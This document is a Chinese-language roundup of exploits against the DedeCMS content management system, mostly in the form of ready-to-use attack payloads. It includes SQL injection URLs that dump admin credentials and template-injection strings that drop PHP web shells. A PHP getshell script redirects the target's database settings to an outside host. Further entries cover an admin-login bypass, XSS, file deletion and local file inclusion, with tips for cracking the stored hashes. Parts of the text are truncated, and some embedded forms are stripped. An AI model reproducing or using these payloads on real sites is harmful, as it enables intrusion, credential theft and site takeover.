dedecms 漏洞汇总

Dedecms 5.6 rss注入漏洞  

http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2)) AND "'" AND updatexml(1,(SELECT CONCAT(0x5b,uname,0x3a,MID(pwd,4,16),0x5d) FROM dede_admin),1)#'][0]=1

DedeCms v5.6 嵌入恶意代码执行漏洞  

注册会员，上传软件：本地地址中填入

a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}

发表后查看或修改即可执行

a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57} 

生成x.php 密码xiao，直接生成一句话。

Dede 5.6 GBK SQL注入漏洞

http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7''; 
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe''")/> 
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7''"><******%20src=http://www.test.com/ 

DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞

http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20'%23@__admin' 

DEDECMS 全版本 gotopage变量XSS漏洞

1.复制粘贴下面的URL访问，触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞，需关闭XSS筛选器。 

http://v57.demo.dedecms.com/dede/login.php?gotopage=">

2.关闭浏览器，无论怎么访问下面的任意URL，都会触发我们的XSS。

http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php

DeDeCMS(织梦)变量覆盖getshell 

#!usr/bin/php -w
12){
echo "[*] Exploit Success \n";
if($aid==1)echo "[*] Shell:".$url."/$path/data/cache/fuck.php\n" ;

if($aid==2)echo "[*] Shell:".$url."/$path/fuck.php\n" ;

if($aid==3)echo "[*] Shell:".$url."/$path/plus/fuck.php\n";

}else{
echo "[*] Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "[*]  No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}

?>

织梦(DedeCms) v5.6-5.7 越权访问漏洞(直接进入后台)

http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

把上面 validate=dcug改为当前的验证码，即可直接进入网站后台。此漏洞的前提是必须得到后台路径才能实现。

dedecms织梦 标签远程文件写入漏洞 

前题条件，必须准备好自己的dede数据库，然后插入数据：

insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');

再用下面表单提交，shell 就在同目录下 1.php。原理自己研究。

DedeCms v5.6 嵌入恶意代码执行漏洞

注册会员，上传软件：本地地址中填入

a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}

发表后查看或修改即可执行

a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}

生成x.php 密码：xiao直接生成一句话，密码xiao 。

Dedecms <= V5.6 Final模板执行漏洞 

1、上传一个模板文件：
注册一个用户，进入用户管理后台，发表一篇文章，上传一个图片，然后在附件管理里，把图片替换为我们精心构造的模板，比如图片名称是：

uploads/userup/2/12OMX04-15A.jpg

模板内容是（如果限制图片格式，加gif89a）：

{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}

2、修改刚刚发表的文章，查看源文件，构造一个表单：

修改文章

标题：

标签TAG：
(用逗号分开)
作者：

隶属栏目：

测试栏目
            
*(不能选择带颜色的分类)

我的分类：

请选择分类...
hahahha


信息摘要：
1111111
(内容的简要说明)

缩略图：



（这里构造）



详细内容


 
1111111
" style="display:none" />

验证码：



提交
重置

提交，提示修改成功，则我们已经成功修改模板路径。
3、访问修改的文章：
假设刚刚修改的文章的aid为2，则我们只需要访问：

http://127.0.0.1/dede/plus/view.php?aid=2

即可以在plus目录下生成webshell：1.php

DEDECMS网站管理系统Get Shell漏洞(5.3/5.6) 

Gif89a
{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}

保存为1.gif

  
  
  

  
  
  
  
更改  
  

构造如上表单，上传后图片保存为/uploads/userup/3/1.gif
发表文章，然后构造修改表单如下：

  
  
  
  
  
  
     
  
  
  
Test  
  
请选择分类...  
aa   
aaaaaaaaaaaaa  
  
  
  
提交  

织梦(Dedecms)V5.6 远程文件删除漏洞 

http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif

织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 

http://www.test.com/plus/carbuyaction.php?dopost=return&code=../../

DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 

plus/advancedsearch.php?mid=1&sql=SELECT * FROM '#@__admin'

密码是32位MD5减去头5位，减去尾七位，得到20 MD5密码，方法是，前减3后减1，得到16位MD5

dedecms织梦 v5.6 两处跨站漏洞  

/plus/search.php?keyword=zhuba&searchtype=titlekeyword&channeltype=0&orderby=&kwtype=1&pagesize=10&typeid=0&TotalResult=%3Ciframe%20src=http://www.test.net%3E&PageNo=2

http://www.test.com/member/login.php?gourl=%22%3E%3Ciframe%20src=http://www.test.net%3E

织梦(Dedecms) 5.1 feedback_js.php 注入漏洞

http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

织梦(Dedecms)select_soft_post.php页面变量未初始漏洞

---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- 












Select U Shell 



It's just a exp for the bug of Dedecms V55...

Need register_globals = on...

Fun the game,get a webshell at /data/cache/fly.php...

织梦(DEDECMS) 5.1 plus/feedback_js.php存在注入漏洞 

为了闭合我用了两次union

http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

DedeCMS 5.1 SQL Injection 

######################### Securitylab.ir ########################
# Application Info:
# Name: DEDECMS
# Version: 5.1
#################################################################
# Discoverd By: Securitylab.ir 
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & info@securitylab[dot]ir
#################################################################
# Vulnerability Info:
# Type: Sql Injection Vulnerability
# Risk: Medium
#===========================================================
# feedback_js.php
$urlindex = 0;
if(empty($arcID))
{
$row = $dlist->dsql->GetOne("Select id From `#@__cache_feedbackurl` where url='$arcurl' ");
if(is_array($row)) $urlindex = $row['id'];
}
if(empty($arcID) && empty($urlindex)) exit();
......
if(empty($arcID)) $wq = " urlindex = '$urlindex' "; 
else $wq = " aid='$arcID' ";
$querystring = "select * from `#@__feedback` where $wq and ischeck='1' order by dtime desc";
$dlist->Init();
$dlist->SetSource($querystring);
...
# http://site.com/[PATH]/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''=
#===========================================================
#################################################################
# Securitylab Security Research Team
###################################################################

织梦(dedecms)V5.5分页处理函数信息泄露漏洞 

http://www.dedecms.com/plus/list.php?tid=10&pageno=0
http://www.dedecms.com/plus/list.php?tid=10&pageno='
http://www.dedecms.com/plus/list.php?tid=10&pageno=-1

织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞

利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。

1. 访问网址：

http://www.abc.com/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>

可看见错误信息

2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。

int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>

3. 执行dede.rar里的文件 test.html，注意 form 中 action 的地址是

按确定后的看到第2步骤的信息表示文件木马上传成功.

织梦(DedeCms)plus/infosearch.php 文件注入漏洞

http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*

DEDECMS跨站及爆绝对路径漏洞

提交：

http://127.0.0.1/dc/include/jump.php?gurl=http://00day.cn 会跳转到http://00day.cn

新手朋友会认为这就是这个跨站的利用了，其实不然，我们可以尝试去闭合他！但PHP有gpc限制，我们该怎么绕？

提交：

http://127.0.0.1/dc/include/jump.php?gurl=%23"/*

Multiple Cross-Site Scripting Vulnerabilities in DedeCms v5.x 

# .: Multiple Cross-Site Scripting Vulnerabilities in DedeCms v5.x
# .: [Author] Depo2 - TpTLabs.com
# .: [Affected versions] http://www.dedecms.com/ - DedeCms v5.x
# .: [Credit] The disclosure of these issues has been credited to Depo2
# .: [Classification]
# Attack Type: Input Manipulation
# Impact: Loss of Integrity
# Fix: N/A Public release vulnz: {26-08-2008 Sun}
# Class Input Validation Error
# Original Advisory http://depo2.nm.ru/DedeCmsv5.x_XSS.txt
# Other Advisory http://www.xssing.com/index.php?x=3&y=53
- XSS -
[DedeCms WebSite]/dede/catalog_tree.php?f=form1&opall=1&v=typeid&bt=[XSS]
[DedeCms WebSite]/dede/catalog_tree.php?f=form1&opall=1&v=[XSS]
[DedeCms WebSite]/dede/catalog_tree.php?f=[XSS]
[DedeCms WebSite]/dede/content_list.php?arcrank=[XSS]
[DedeCms WebSite]/dede/content_list.php?dopost=listArchives&nowpage=1&totalresult=0&arcrank=[XSS]&cid=[XSS/SQL]&keyword=[XSS]+&orderby=[XSS/SQL]&imageField=%CB%D1%CB%F7
[DedeCms WebSite]/dede/content_list.php?channelid=[XSS]&cid=0&adminid=[XSS]
[DedeCms WebSite]/include/dialog/select_images.php?f=form1.picname&imgstick=[XSS]
[DedeCms WebSite]/include/dialog/select_images.php?f=[XSS]
[DedeCms WebSite]/dede/login.php?gotopage=[XSS]
[DedeCms WebSite]/dede/article_keywords_select.php?f=[XSS]
[DedeCms WebSite]/dede/file_pic_view.php?activepath=[XSS]
[DedeCms WebSite]/member/login.php?gourl=[XSS]
[DedeCms WebSite]/dede/pic_view.php?activepath=[XSS]

Php Path Discusion

[DedeCms WebSite]/include/dialog/

XSRF 

[DedeCms WebSite]/dede/sys_info.php? have XSRF
edit___cfg_beian,edit___cfg_keywords etc.. parameter not checking evil code
if attacker wright a "end of textarea"  tag thats give XSS alert :)

[XSS Code] :'">

织梦(dedecms)2007 group/search.php注入漏洞 

http://127.0.0.1/dg/group/search.php?sad=g&keyword=%cf'